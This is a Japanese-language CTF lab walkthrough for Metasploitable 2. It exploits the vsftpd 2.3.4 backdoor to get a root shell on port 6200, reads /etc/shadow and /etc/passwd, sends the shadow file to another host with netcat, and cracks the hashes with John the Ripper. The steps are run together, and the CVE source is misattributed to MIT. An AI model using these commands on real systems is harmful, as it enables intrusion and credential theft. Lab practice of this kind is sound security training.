
vsftpd 2.3.4のバックドア(CVE-2011-2523)を悪用して、Metasploitable 2から/etc/shadowと/etc/passwdを取得・解読するステップバイステップのCTFウォークスルー。
脆弱なMetasploitable 2サーバーから復号された/etc/shadowと/etc/passwdファイルを取得します。
このCTFでは、VMware Workstation Proと2つの仮想マシンを使用します。攻撃機としてKali Linux、脆弱機としてMetasploitable 2を利用します。
Open a Virtual Machineオプションを選択し、解凍したKali Linuxファイルを選択します。openオプションを選択し、解凍したMetasploitable 2ファイルを選択します。Play virtual machineボタンをクリックします。I moved ItまたはI copied Itの選択を求められたら、I copied Itを選択します。kaliでログインします。msfadminでログインします。ip addr showを実行し、inetセクションのIPアドレスを記録します。マサチューセッツ工科大学の研究エンジニアリング部門は、CVE-2011-2523を一般的な脆弱性および暴露として詳細に説明しており、20110630から20110703の間にダウンロードされたvsftpd 2.3.4には、ポート6200/tcpにシェルを開くバックドアが含まれています。
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:)で終わる任意の文字列です。user <string>:)を入力します。pass <string>を入力します。 nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoamiでrootアクセスが付与されたことを確認します。/etc/shadowと/etc/passwdファイルを別のファイルにコピーcp /etc/shadow shadow.txtcp /etc/passwd passwd.txtip addr showを使ってinetのIPアドレスを確認します。nc -l -p 1234 > shadow.txtを使用してファイルを受信待ちします。nc -w 3 <destination-ip> 1234 < shadow.txtを実行します。Johnツールの形式に整形unshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-inputでファイルを確認します。ユーザー名とパスワードが保存されているはずです。Johnコマンドとワードリストを使用してshadowファイルを復号rockyou.txtを使用してjohnでハッシュをクラックします。sudo gzip -d /usr/share/wordlists/rockyou.txt.gzを使用してワードリストファイルを解凍します。kaliを使用します。john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtを使用してパスワードをハッシュ解除します。john –show unshadowed-inputでクラックされたパスワードを表示します。